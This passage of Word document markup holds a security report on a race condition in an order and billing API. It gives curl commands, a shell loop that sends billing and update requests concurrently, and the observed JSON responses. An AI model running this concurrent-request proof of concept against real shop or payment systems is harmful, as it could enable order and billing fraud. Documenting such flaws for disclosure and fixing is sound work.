      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Then save:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E018AF9" w14:textId="36CFDCC1" w:rsidR="00C25B37" w:rsidRPr="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C25B37">
        <w:t>export ORDER_ID="18920727-7ee0-4b42-a601-bfe8f8b3b568"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE94B9" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2348CEEE" w14:textId="03AFF697" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Update the order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7622BF" w14:textId="77777777" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521FEE80" w14:textId="77777777" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D7AAB" w14:textId="77777777" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476F2AC" w14:textId="5627C79D" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--data-raw '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>action":"update","order-id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"'$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ORDER_ID'","items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">":{"1":1}}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D1D4ABC" w14:textId="79869B0D" w:rsidR="00D00A7D" w:rsidRPr="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observed result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9A5CE" w14:textId="77777777" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA80C3" w14:textId="77777777" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "status": "ok",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAAA22" w14:textId="77777777" w:rsidR="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "msg": "cart updated"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1FFF2F" w14:textId="288DA668" w:rsidR="00D00A7D" w:rsidRPr="00D00A7D" w:rsidRDefault="00D00A7D" w:rsidP="00D00A7D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09E3F9" w14:textId="73425344" w:rsidR="005E1E77" w:rsidRDefault="005E1E77">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52815E46" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="75F5BAD1" w14:textId="76A1B242" w:rsidR="007320F2" w:rsidRDefault="007320F2" w:rsidP="007320F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007320F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Confirm billing works before the race</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AAF292" w14:textId="77777777" w:rsidR="007320F2" w:rsidRDefault="007320F2" w:rsidP="007320F2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328BFA2" w14:textId="77777777" w:rsidR="007320F2" w:rsidRDefault="007320F2" w:rsidP="007320F2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4C4F3E" w14:textId="77777777" w:rsidR="007320F2" w:rsidRDefault="007320F2" w:rsidP="007320F2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F0FB2" w14:textId="0388C982" w:rsidR="007320F2" w:rsidRDefault="007320F2" w:rsidP="007320F2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--data-raw '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>action":"billing","order-id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">":"'$ORDER_ID'"}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23710235" w14:textId="4D752B35" w:rsidR="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observed result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAF34C" w14:textId="77777777" w:rsidR="00891046" w:rsidRPr="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58146786" w14:textId="77777777" w:rsidR="00891046" w:rsidRPr="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:t xml:space="preserve">  "status": "ok",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4735F" w14:textId="77777777" w:rsidR="00891046" w:rsidRPr="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:t xml:space="preserve">  "amount": 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5AC85E" w14:textId="77777777" w:rsidR="00891046" w:rsidRPr="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:t xml:space="preserve">  "token": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00891046">
        <w:t>TZPeHUvNMknb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00891046">
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5BB94" w14:textId="77777777" w:rsidR="00891046" w:rsidRPr="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:t xml:space="preserve">  "missing": {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A24290" w14:textId="5BB9F94D" w:rsidR="00891046" w:rsidRDefault="00891046" w:rsidP="00891046">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00891046">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53627961" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRPr="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1E77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Trigger the race condition before </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E1E77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FB61D4F" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in {1..5}; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F515E" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D314BAE" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" -H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" -H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77312574" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--data-raw '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>action":"billing","order-id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"'$ORDER_ID'"}' &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376CBC7" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7455DA" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" -H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" -H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E6DC0" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--data-raw '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>action":"update","order-id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"'$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ORDER_ID'","items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{"1":1}}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D954BC6" w14:textId="77777777" w:rsidR="005E1E77" w:rsidRDefault="005E1E77" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C202BC" w14:textId="6DDFC180" w:rsidR="005E1E77" w:rsidRDefault="001F662A" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="005E1E77">
        <w:t>one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D9520" w14:textId="77777777" w:rsidR="001F662A" w:rsidRDefault="001F662A" w:rsidP="005E1E77">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3120126A" w14:textId="38395914" w:rsidR="001F662A" w:rsidRDefault="001F662A" w:rsidP="001F662A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001F662A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observed result before fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4673B4AE" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already paid"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE761D5" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already paid"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1146D" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already made"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20997097" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already paid"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39812646" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already made"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA627F8" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already made"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43581515" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already made"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252DA51E" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already paid"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6324253F" w14:textId="77777777" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already made"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC28C59" w14:textId="7CB5C84F" w:rsidR="004754AE" w:rsidRDefault="004754AE" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"err","msg":"order</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already paid"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EFF74B" w14:textId="77777777" w:rsidR="00C50625" w:rsidRDefault="00C50625" w:rsidP="004754AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B048B4" w14:textId="1AF283E6" w:rsidR="00C50625" w:rsidRPr="001F662A" w:rsidRDefault="00C50625" w:rsidP="00C50625">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C50625">
        <w:t>This shows the order reached a changed state during the concurrent workflow and later requests were rejected only after that progression had happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16284B85" w14:textId="63FA8101" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A51CD" w14:textId="6A51A2D3" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00472D4A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability evidence is the timing-sensitive behavior across the same order lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216115A4" w14:textId="77777777" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00472D4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>the order was successfully created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24880B32" w14:textId="77777777" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00472D4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>the order was successfully updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222561B" w14:textId="77777777" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00CF2583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>billing succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E1496" w14:textId="77777777" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00CF2583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>then concurrent replay attempts showed mixed state-based rejections like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078A2F9" w14:textId="77777777" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00CF2583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>order already paid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6874A516" w14:textId="21202C56" w:rsidR="00472D4A" w:rsidRDefault="00472D4A" w:rsidP="00CF2583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>order already made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D899151" w14:textId="5DEE1A0D" w:rsidR="00BA72A1" w:rsidRDefault="00472D4A" w:rsidP="00472D4A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>This proves the application accepted sensitive workflow operations and only later enforced the state boundary. That is consistent with a logic flaw in order sequencing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F5863" w14:textId="77777777" w:rsidR="00CF2583" w:rsidRDefault="00CF2583" w:rsidP="00472D4A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D0AA34" w14:textId="77777777" w:rsidR="00CF2583" w:rsidRDefault="00CF2583" w:rsidP="00CF2583">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2659D7EA" wp14:editId="38DF317B">
            <wp:extent cx="5943600" cy="2289748"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="774548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2289748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCB26B" w14:textId="3221227B" w:rsidR="00CF2583" w:rsidRDefault="00CF2583" w:rsidP="00CF2583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2583">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF2583">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CF2583">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CF2583">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D90B21">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF2583">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CF2583">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Create Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C45AA" w14:textId="77777777" w:rsidR="009B41FC" w:rsidRDefault="009B41FC" w:rsidP="009B41FC"/>
    <w:p w14:paraId="01166778" w14:textId="77777777" w:rsidR="009B41FC" w:rsidRDefault="009B41FC" w:rsidP="009B41FC">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6709D2" wp14:editId="5262E976">
            <wp:extent cx="5943600" cy="1566530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4740341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1566530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E5AC1" w14:textId="35F61EA2" w:rsidR="009B41FC" w:rsidRPr="009B41FC" w:rsidRDefault="009B41FC" w:rsidP="009B41FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B41FC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009B41FC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009B41FC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
